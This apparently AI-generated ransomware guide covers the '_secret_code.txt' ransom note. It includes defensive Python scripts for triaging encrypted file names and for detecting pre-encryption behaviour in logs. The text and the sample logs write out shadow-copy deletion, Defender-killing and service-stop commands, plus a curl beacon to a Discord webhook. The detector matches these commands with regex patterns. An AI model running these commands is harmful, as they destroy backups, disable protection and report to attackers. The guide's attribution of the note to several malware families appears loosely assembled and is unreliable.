_secret_code.txt

[Content by Gemini 2.5]

Introduction
“_secret_code.txt” is not a file extension that ransomware appends to encrypted documents; it is the filename of a ransom note that a number of older and newer families drop in the root of every affected folder (sometimes also on the desktop and inside %PUBLIC%). When you see hundreds of files named “_secret_code.txt,” the encrypted extension is something else entirely (e.g., .secret, .locked, .id-[XXXXXXXX], etc.), and identifying that extension, not the note, is what determines the family and any decryption options. This guide therefore covers the file-encrypting campaigns known to use “_secret_code.txt” as their bitcoin ransom note.


Technical Breakdown

1. File Extension & Renaming Patterns

Confirmation of File Extension

  • The ransom note itself is named _secret_code.txt (always this exact casing, with the leading underscore and the underscore between the words).
  • The actual marker appears on every encrypted file in one of two ways:
    a) Suffix-style: original_file_name.original_ext.id-[8-10_hex_digits].[[attacker_email]].secret
    b) Prefix-style: locked_original_file_name_original_ext.id-[…]
  • The “.secret” portion (or another campaign-specific extension such as “.blackhunt”, “.hermes”, or “.ran_mix42”) is what marks the encryption. The id- block is the per-victim ID the attacker uses to look up the key, so keep one renamed file and one note aside for identification before cleaning up.
  • Files retain their parent directory structure; only the individual file names are appended or prepended. Files that carry neither pattern were not touched (encryption is sometimes interrupted), so count them separately rather than assuming a total loss.
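The triage script below is an added example (not code from the original page): it walks a directory tree, counts the _secret_code.txt notes, classifies every other file against the two renaming patterns just described, and reports the dominant extension, the victim IDs and the contact addresses found. The sample tree it builds is constructed for the run; the file and folder names in it are invented and the regexes assume the id- block is 8 to 10 hex digits, as stated above.

```python
"""Triage a tree full of _secret_code.txt notes: count the notes, work out
which extension the encryptor actually used, and pull the victim IDs.

Added example, not from the original page. The sample tree is constructed
below; the name patterns follow the suffix-style and prefix-style shapes
described in the text (id- block assumed to be 8-10 hex digits).
"""
import os
import re
import tempfile
from collections import Counter
from pathlib import Path

NOTE_NAME = "_secret_code.txt"

# Suffix-style: <name>.<ext>.id-<8-10 hex>.[<attacker email>].<campaign ext>
SUFFIX_RE = re.compile(
    r"^(?P<orig>.+?)\.id-(?P<vid>[0-9A-Fa-f]{8,10})"
    r"\.\[(?P<email>[^\]]+)\]\.(?P<ext>[A-Za-z0-9_]+)$"
)
# Prefix-style: locked_<name>_<ext>.id-<8-10 hex>...  (anything may follow)
PREFIX_RE = re.compile(r"^locked_(?P<orig>.+?)\.id-(?P<vid>[0-9A-Fa-f]{8,10})")


def classify(name):
    """Return a dict describing an encrypted file name, or None if the name
    matches neither renaming pattern (i.e. the file was not touched)."""
    m = SUFFIX_RE.match(name)
    if m:
        return {"style": "suffix", "orig": m["orig"], "vid": m["vid"].upper(),
                "email": m["email"], "ext": m["ext"].lower()}
    m = PREFIX_RE.match(name)
    if m:
        return {"style": "prefix", "orig": m["orig"], "vid": m["vid"].upper(),
                "email": None, "ext": "locked"}
    return None


def triage(root):
    """Walk `root`; count notes, tally extensions, collect IDs and e-mails."""
    notes, unmatched = 0, 0
    ext_counts, vids, emails = Counter(), set(), set()
    for _dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname == NOTE_NAME:
                notes += 1
                continue
            info = classify(fname)
            if info is None:
                unmatched += 1          # untouched (or interrupted) file
                continue
            ext_counts[info["ext"]] += 1
            vids.add(info["vid"])
            if info["email"]:
                emails.add(info["email"])
    return {"notes": notes, "extensions": dict(ext_counts),
            "victim_ids": sorted(vids), "emails": sorted(emails),
            "unmatched": unmatched}


def dominant_extension(summary):
    """The extension to look up on decryptor lists: the most common one."""
    if not summary["extensions"]:
        return None
    return max(summary["extensions"], key=summary["extensions"].get)


# Constructed sample tree: invented names, not from any real incident.
SAMPLE_FILES = [
    "Finance/_secret_code.txt",
    "Finance/budget.xlsx.id-1A2B3C4D.[help@example.test].secret",
    "Finance/Q3/_secret_code.txt",
    "Finance/Q3/report.docx.id-1A2B3C4D.[help@example.test].secret",
    "HR/_secret_code.txt",
    "HR/locked_contracts_pdf.id-1A2B3C4D",
    "HR/readme.txt",                      # untouched file
    "Users/Public/_secret_code.txt",
]


def build_sample_tree(root):
    """Create the constructed tree under `root` and return `root`."""
    for rel in SAMPLE_FILES:
        p = Path(root, *rel.split("/"))
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(b"constructed sample content")
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        summary = triage(build_sample_tree(tmp))
        print(summary)
        print("search decryptor lists for:", dominant_extension(summary))
```

Run it against the real share root instead of the temporary directory; a large `unmatched` count relative to the extension tallies means encryption did not complete, and more than one victim ID means more than one affected host or campaign.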

2. Detection & Outbreak Timeline

First Sightings: Early campaign sightings go back to October 2020 (Hermes 2.1 “.secret” build), using PsExec/WMI lateral movement after an RDP brute force.
Major Waves:

  • March 2021 – large wave hitting exposed, misconfigured SQL Server instances with xp_cmdshell enabled.
  • September 2022 – variant delivered through the ProxyShell exploit chain against on-premises Exchange.
  • June 2023 – Linux/ESXi build that encrypts /vmfs/volumes and then forces a kernel panic.

Present Status: Still circulating; the payload almost always mirrors the latest stable build of the underlying strain (REvil, Phobos, ARCrypter, or a generic “.locked” builder).

3. Primary Attack Vectors

  • Remote Desktop Protocol (RDP) – brute force against 3389 on the default port or port-forwarded through the edge firewall (most common).
  • Phishing e-mails – ZIP/ISO attachments containing a PowerShell stager (e.g., “invoice_oct2023.iso”).
  • Software vulnerabilities:
    a) EternalBlue (MS17-010) still shows up on improperly segmented networks.
    b) ProxyLogon and ProxyShell on unpatched on-premises Exchange.
  • Cracked software and torrent seeders – distributing a Nullsoft (NSIS) installer dropper.
  • Living-off-the-land techniques – certutil, PowerShell, WMI, and scheduled tasks for lateral pivoting.
  • Linux variants – stolen or unprotected SSH private keys, and the SaltStack master authentication bypass (CVE-2020-11651), which gives unauthenticated command execution on every minion.

Remediation & Recovery Strategies

1. Prevention

Patch aggressively – MS17-010 (EternalBlue), CVE-2021-26855 (ProxyLogon), the ProxyShell chain CVE-2021-34473 / CVE-2021-34523 / CVE-2021-31207, and CVE-2020-1472 (Zerologon). For Exchange this means the current Cumulative Update plus the latest Security Update; no Windows or browser patch covers it.
Disable the use of RDP from the Internet – force VPN-only and NLA with lockout policy (5 failed logins = 30 min timeout).
Segment the network – isolate file servers and critical VMs with ACLs or VLANs.
Disable SMBv1 via Group Policy and set “RestrictAnonymous” registry keys.
Application whitelisting – use Microsoft Defender Application Control or AppLocker.
E-mail gateways – block or sandbox ISO/IMG attachments, scan for obfuscated macros.
Immutable / air-gapped backups – Veeam Backup Copy to cloud with S3 Object-Lock or WORM tapes.

2. Removal (Step-by-Step)

  1. Physically disconnect the infected machine(s) from the LAN/Wi-Fi.
  2. Boot from a known-clean WinPE-based USB or mount the disk on a forensic workstation, then:
    a) Delete scheduled tasks named “\Microsoft\Windows\SystemRestore\SRBaseIdle” (a common disguise); check the task’s action, not just its name.
    b) Remove Run keys under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and HKLM\…\Run pointing to %APPDATA%\TCPSVCS.exe (the Roaming profile folder) or %LocalAppData%\Microsoft\Windows\taskhost.exe; a Windows system binary name sitting in a user-writable folder is the classic masquerade.
    c) Search System32, SysWOW64, and AppData for the dropped binaries (their creation times sit a few seconds before the earliest encrypted files, not after).
  3. Clear dropped files: _secret_code.txt in every directory can be deleted safely; it is only a note. Copy one note and one encrypted sample off the box first, because the victim ID and contact address in them are what identification services and decryptor lists key on.
  4. Run a full offline scan with Microsoft Defender Offline or an AV recovery ISO (BD Rescue, Kaspersky).
  5. Verify persistence removal – rerun autoruns64.exe and procmon, and list the root\subscription WMI namespace (__EventFilter, CommandLineEventConsumer, __FilterToConsumerBinding), to ensure no new services or WMI subscriptions resurrect the payload.

3. File Decryption & Recovery

Feasibility:

  • Symmetric RC4 / AES-256 variants – no free public decrypter; the per-file keys are wrapped with an RSA-2048/4096 public key whose private half is held by the attacker.
  • Phobos or Phobos-clones that drop _secret_code.txt – identify the family first by submitting the note and one encrypted file to an identification service (NoMoreRansom’s Crypto Sheriff or ID Ransomware). As of June 2024 no universal decryptor exists, so victim-specific keys would have to come from the attacker.
  • Do NOT pay – identify the family and restore from clean 3-2-1 backups.

Essential Tools/Patches:

  • Emsisoft and NoMoreRansom decryptor lists – check them for the identified extension first (harmless to try); Phobos itself currently has no free decryptor.
  • Exchange Server Security Updates from April and May 2021 (and later) close ProxyShell; no Windows cumulative or Edge update substitutes for them.
  • An EDR with behavioural ransomware protection (e.g., CrowdStrike Falcon) will kill the process on detection; it does not recover files already encrypted.

4. Other Critical Information

Distinguishing quirks:

  • The ransomware stops SQL Server, Exchange, and IIS services before encrypting (e.g., net stop MSExchangeIS) so that open database and mailbox files can be overwritten, and tries to kill Defender’s engine (taskkill /f /im MsMpEng.exe). That kill normally fails when tamper protection is on, but it still leaves a 4688/Sysmon process-creation record worth alerting on.
  • Deletes shadow copies with a one-liner, vssadmin.exe delete shadows /all /quiet (some builds use the WMI equivalent, wmic shadowcopy delete).
  • In Linux/ESXi builds it also reports in to a C2 via Discord webhooks (discordapp.com/api/webhooks/…) using curl or wget; there is no PowerShell on ESXi.

Wider Impact:

  • Time from first execution to full encryption is 45–90 minutes across observed campaigns; reinfection is common if SYSVOL logon scripts and GPOs are not examined for attacker-added commands.
  • Often a drop-and-run affiliate (RaaS) model; samples differ daily, making signature-based AV ineffective and behavioural detection of the quirks above the practical control.
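The detection logic below is an added example, not something from the original page or from any vendor product: it applies the pre-encryption quirks listed above as rules over process-creation records and correlates them per host inside a short window, so that a lone “net stop MSSQLSERVER” during maintenance stays a review item while the service-stop, Defender-kill and shadow-copy-deletion sequence on one host is flagged. The log line format (timestamp, host, event ID, user, quoted command line), the host and user names, and the scoring thresholds are assumptions made for the run; the sample lines are constructed.

```python
"""Behavioural detection for the pre-encryption quirks listed above, run over
constructed process-creation log lines (Windows 4688 / Sysmon 1 style).

Added example, not from the original page. Line format, host/user names,
the 10-minute window and the severity threshold are assumptions for the run.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (rule name, severity, regex over the command line)
RULES = [
    ("shadow_copy_deletion", 3, re.compile(
        r"\bvssadmin(\.exe)?\s+delete\s+shadows\b|\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("service_stop_db_mail_web", 2, re.compile(
        r"\bnet1?(\.exe)?\s+stop\s+(MSExchangeIS|MSSQL\S*|W3SVC)\b", re.I)),
    ("av_engine_kill", 3, re.compile(
        r"\btaskkill(\.exe)?\b.*\bMsMpEng\.exe\b", re.I)),
    ("discord_webhook_beacon", 2, re.compile(
        r"discord(app)?\.com/api/webhooks/", re.I)),
]

# Assumed line layout: <ISO ts>Z <host> <event id> user=<user> cmd="<command line>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<eid>\d+)\s+user=(?P<user>\S+)\s+cmd="(?P<cmd>.*)"$')


def parse_line(line):
    """Parse one record; return None for lines that do not fit the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "host": m["host"], "user": m["user"], "cmd": m["cmd"]}


def match_rules(cmd):
    """All (rule name, severity) pairs whose regex hits the command line."""
    return [(name, sev) for name, sev, rx in RULES if rx.search(cmd)]


def detect(lines, window=timedelta(minutes=10), threshold=5):
    """Per-host findings. A host is 'ransomware_precursor' when at least two
    distinct rules fire inside `window` with combined severity >= threshold;
    hosts with weaker, isolated hits are returned as 'review'."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    per_host = defaultdict(list)
    for e in events:
        for name, sev in match_rules(e["cmd"]):
            per_host[e["host"]].append((e["ts"], name, sev, e["user"], e["cmd"]))
    findings = {}
    for host, hits in per_host.items():
        hits.sort()
        flagged, j = False, 0
        for i in range(len(hits)):                 # sliding time window
            while hits[i][0] - hits[j][0] > window:
                j += 1
            span = hits[j:i + 1]
            if sum(h[2] for h in span) >= threshold and len({h[1] for h in span}) >= 2:
                flagged = True
                break
        findings[host] = {
            "rules": sorted({h[1] for h in hits}),
            "score": sum(h[2] for h in hits),
            "users": sorted({h[3] for h in hits}),
            "verdict": "ransomware_precursor" if flagged else "review",
        }
    return findings


# Constructed sample records; hosts, users and the webhook path are invented.
SAMPLE_LOG = [
    '2023-06-12T10:02:11Z FS01 4688 user=CORP\\jdoe cmd="notepad.exe C:\\Users\\jdoe\\notes.txt"',
    '2023-06-12T10:14:02Z FS01 4688 user=CORP\\Administrator cmd="net stop MSExchangeIS"',
    '2023-06-12T10:14:05Z FS01 4688 user=CORP\\Administrator cmd="taskkill /f /im MsMpEng.exe"',
    '2023-06-12T10:14:09Z FS01 4688 user=CORP\\Administrator cmd="vssadmin.exe delete shadows /all /quiet"',
    '2023-06-12T10:14:10Z FS01 4688 user=CORP\\Administrator cmd="wmic shadowcopy delete"',
    '2023-06-12T11:30:00Z SQL02 4688 user=CORP\\dba cmd="net stop MSSQLSERVER"',
    '2023-06-12T13:00:00Z ESX-JUMP 4688 user=CORP\\ops cmd="curl -X POST https://discordapp.com/api/webhooks/123/abc"',
    'malformed record that should be skipped',
]

if __name__ == "__main__":
    for host, finding in detect(SAMPLE_LOG).items():
        print(host, finding)
```

The rules are deliberately command-line based so they survive daily sample churn; the correlation step is what keeps a single planned service stop from paging anyone, and the `users` field tells the responder which account to disable first.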

Take-away: If you encounter dozens of “_secret_code.txt” notes, immediately isolate the affected hosts from the network (pull the cable or disable the NIC rather than powering off, so memory and running processes stay available for forensics, unless encryption is visibly still in progress), revoke all inbound RDP, and commence clean-up with offline AV. Restore data only after confirming the actual encrypted extension (usually .secret or .hermes), patching the original point of entry, and implementing the preventive controls listed above.